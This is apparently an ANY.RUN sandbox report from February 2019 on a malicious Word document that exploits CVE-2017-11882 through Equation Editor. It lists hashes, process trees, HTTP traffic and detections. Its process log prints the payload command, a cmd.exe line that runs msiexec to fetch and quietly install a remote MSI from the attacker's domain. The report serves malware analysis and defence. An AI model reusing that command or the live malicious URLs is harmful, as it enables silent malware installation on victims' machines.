analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
URL:

http://amazonvietnampharma.com.vn/l/css/css.doc

Full analysis: https://app.any.run/tasks/0638210b-94ec-404f-9497-b4a68a9e156e
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Malware Trends Tracker     >>>
Analysis date: February 19, 2019, 06:39:04
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
exploit
CVE-2017-11882
exe-to-msi
loader
Indicators:
MD5:

B8656D933E1B2913E492318164EE9D0A

SHA1:

F4E39168525AD2A5EE29D033C7202D107BE1BCCE

SHA256:

546AC2B3A405535E57BDB08485A6AF39C23A3D8BB347489EBEABD3837E32E037

SSDEEP:

3:N1KfWt05Ld2qUBAdn:CECLd2Z8n

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Equation Editor starts application (CVE-2017-11882)

      • EQNEDT32.EXE (PID: 2212)

    • Uses Microsoft Installer as loader

      • cmd.exe (PID: 3032)

    • Downloads executable files from the Internet

      • msiexec.exe (PID: 2904)

  • SUSPICIOUS

    • Unusual connect from Microsoft Office

      • WINWORD.EXE (PID: 2248)

    • Starts Microsoft Office Application

      • WINWORD.EXE (PID: 2248)

    • Application launched itself

      • WINWORD.EXE (PID: 2248)

    • Starts CMD.EXE for commands execution

      • EQNEDT32.EXE (PID: 2212)

    • Executable content was dropped or overwritten

      • msiexec.exe (PID: 2904)

    • Reads Internet Cache Settings

      • WINWORD.EXE (PID: 2248)

    • Drop ExeToMSI Application

      • msiexec.exe (PID: 2904)

  • INFO

    • Application launched itself

      • iexplore.exe (PID: 2956)

    • Changes internet zones settings

      • iexplore.exe (PID: 2956)

    • Reads Internet Cache Settings

      • iexplore.exe (PID: 3232)

    • Creates files in the user directory

      • iexplore.exe (PID: 2956)
      • iexplore.exe (PID: 3232)
      • WINWORD.EXE (PID: 2248)

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2248)
      • WINWORD.EXE (PID: 3660)

    • Application was crashed

      • EQNEDT32.EXE (PID: 2212)

    • Reads internet explorer settings

      • iexplore.exe (PID: 3232)

    • Writes to a desktop.ini file (may be used to cloak folders)

      • msiexec.exe (PID: 2904)

    • Application was dropped or rewritten from another process

      • MSI71E6.tmp (PID: 1932)

    • Starts application with an unusual extension

      • msiexec.exe (PID: 2904)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
45
Monitored processes
10
Malicious processes
2
Suspicious processes
1

Behavior graph

Click at the process to see the details
start drop and start iexplore.exe iexplore.exe winword.exe winword.exe no specs eqnedt32.exe cmd.exe no specs msiexec.exe no specs msiexec.exe eqnedt32.exe no specs msi71e6.tmp no specs

Process information

PID
CMD
Path
Indicators
Parent process
2956"C:\Program Files\Internet Explorer\iexplore.exe" -nohomeC:\Program Files\Internet Explorer\iexplore.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Explorer
Exit code:
1
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
3232"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2956 CREDAT:71937C:\Program Files\Internet Explorer\iexplore.exe
iexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Internet Explorer
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
2248"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -EmbeddingC:\Program Files\Microsoft Office\Office14\WINWORD.EXE
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3660"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /EmbeddingC:\Program Files\Microsoft Office\Office14\WINWORD.EXEWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
2212"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -EmbeddingC:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
svchost.exe
User:
admin
Company:
Design Science, Inc.
Integrity Level:
MEDIUM
Description:
Microsoft Equation Editor
Exit code:
0
Version:
00110900
3032cmd.exe & /C CD C: & msiexec.exe /i http://amazonvietnampharma.com.vn/l/css/baba.msi /quiet C:\Windows\system32\cmd.exeEQNEDT32.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3532msiexec.exe /i http://amazonvietnampharma.com.vn/l/css/baba.msi /quiet C:\Windows\system32\msiexec.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
2904C:\Windows\system32\msiexec.exe /VC:\Windows\system32\msiexec.exe
services.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows® installer
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
1436"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -EmbeddingC:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEsvchost.exe
User:
admin
Company:
Design Science, Inc.
Integrity Level:
MEDIUM
Description:
Microsoft Equation Editor
Exit code:
0
Version:
00110900
1932"C:\Windows\Installer\MSI71E6.tmp"C:\Windows\Installer\MSI71E6.tmpmsiexec.exe
User:
admin
Integrity Level:
MEDIUM
Total events
2 351
Read events
1 533
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
27
Text files
22
Unknown types
8

Dropped files

PID
Process
Filename
Type
2956iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RB73MZ6Y\favicon[1].ico
MD5:
SHA256:
2956iexplore.exeC:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
MD5:
SHA256:
2248WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR28F.tmp.cvr
MD5:
SHA256:
2248WINWORD.EXEC:\Users\admin\AppData\Local\Temp\{1AAC766E-A992-4E00-8D7E-C255F6D2B3E3}
MD5:
SHA256:
2248WINWORD.EXEC:\Users\admin\AppData\Local\Temp\{BCE79603-2337-44F7-A1F0-9E7D16C9A275}
MD5:
SHA256:
3232iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\OCDM6JB6\css[1].doctext
MD5:C450C7DFC7572C12D6F3A86126A37AC9
SHA256:166AD91951FBFCC8BADF51A48BA6E385D78975368B8061F202D05ECAFA9E971C
2248WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-CNRY.FSDbinary
MD5:01429CF16D374CE044788483299CDEF5
SHA256:2B3CF93FAFA364E8235E972D7ED8B3B1F18F2B578ACF9BE034901F30807A895C
2956iexplore.exeC:\Users\admin\AppData\Local\Temp\~DFF1DC96E24EC927EA.TMP
MD5:
SHA256:
2956iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\{15A49CD2-3411-11E9-AA93-5254004A04AF}.dat
MD5:
SHA256:
2956iexplore.exeC:\Users\admin\AppData\Local\Temp\~DFBF40F5503356F2C1.TMP
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
11
TCP/UDP connections
8
DNS requests
2
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2248
WINWORD.EXE
HEAD
200
115.146.122.229:80
http://amazonvietnampharma.com.vn/l/css/css.doc
VN
suspicious
2248
WINWORD.EXE
HEAD
200
115.146.122.229:80
http://amazonvietnampharma.com.vn/l/css/css.doc
VN
suspicious
2248
WINWORD.EXE
OPTIONS
405
115.146.122.229:80
http://amazonvietnampharma.com.vn/l/css/
VN
html
231 b
suspicious
3232
iexplore.exe
GET
200
115.146.122.229:80
http://amazonvietnampharma.com.vn/l/css/css.doc
VN
text
56.4 Kb
suspicious
2248
WINWORD.EXE
OPTIONS
405
115.146.122.229:80
http://amazonvietnampharma.com.vn/l/css/
VN
html
231 b
suspicious
2956
iexplore.exe
GET
200
204.79.197.200:80
http://www.bing.com/favicon.ico
US
image
237 b
whitelisted
2248
WINWORD.EXE
OPTIONS
405
115.146.122.229:80
http://amazonvietnampharma.com.vn/l/css/
VN
html
231 b
suspicious
2248
WINWORD.EXE
HEAD
200
115.146.122.229:80
http://amazonvietnampharma.com.vn/l/css/css.doc
VN
compressed
56.4 Kb
suspicious
2248
WINWORD.EXE
GET
200
115.146.122.229:80
http://amazonvietnampharma.com.vn/l/css/css.doc
VN
text
56.4 Kb
suspicious
976
svchost.exe
OPTIONS
405
115.146.122.229:80
http://amazonvietnampharma.com.vn/l/css
VN
html
230 b
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
976
svchost.exe
115.146.122.229:80
amazonvietnampharma.com.vn
CMC Telecommunications Services Company
VN
suspicious
2956
iexplore.exe
204.79.197.200:80
www.bing.com
Microsoft Corporation
US
whitelisted
2904
msiexec.exe
115.146.122.229:80
amazonvietnampharma.com.vn
CMC Telecommunications Services Company
VN
suspicious
2248
WINWORD.EXE
115.146.122.229:80
amazonvietnampharma.com.vn
CMC Telecommunications Services Company
VN
suspicious
3232
iexplore.exe
115.146.122.229:80
amazonvietnampharma.com.vn
CMC Telecommunications Services Company
VN
suspicious

DNS requests

Domain
IP
Reputation
www.bing.com
  • 204.79.197.200
  • 13.107.21.200
whitelisted
amazonvietnampharma.com.vn
  • 115.146.122.229
suspicious

Threats

PID
Process
Class
Message
2904
msiexec.exe
Potential Corporate Privacy Violation
SUSPICIOUS [PTsecurity] Executable application_x-msi Download
2904
msiexec.exe
Potential Corporate Privacy Violation
POLICY [PTsecurity] Executable application_x-msi Download
2904
msiexec.exe
Misc activity
SUSPICIOUS [PTsecurity] Executable ExeToMSI Download
1 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
http://amazonvietnampharma.com.vn/l/css/css.doc